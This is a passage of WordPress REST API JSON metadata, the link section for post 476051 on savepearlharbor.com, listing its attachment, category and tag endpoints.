s"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=476051"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=476051"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=476051"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}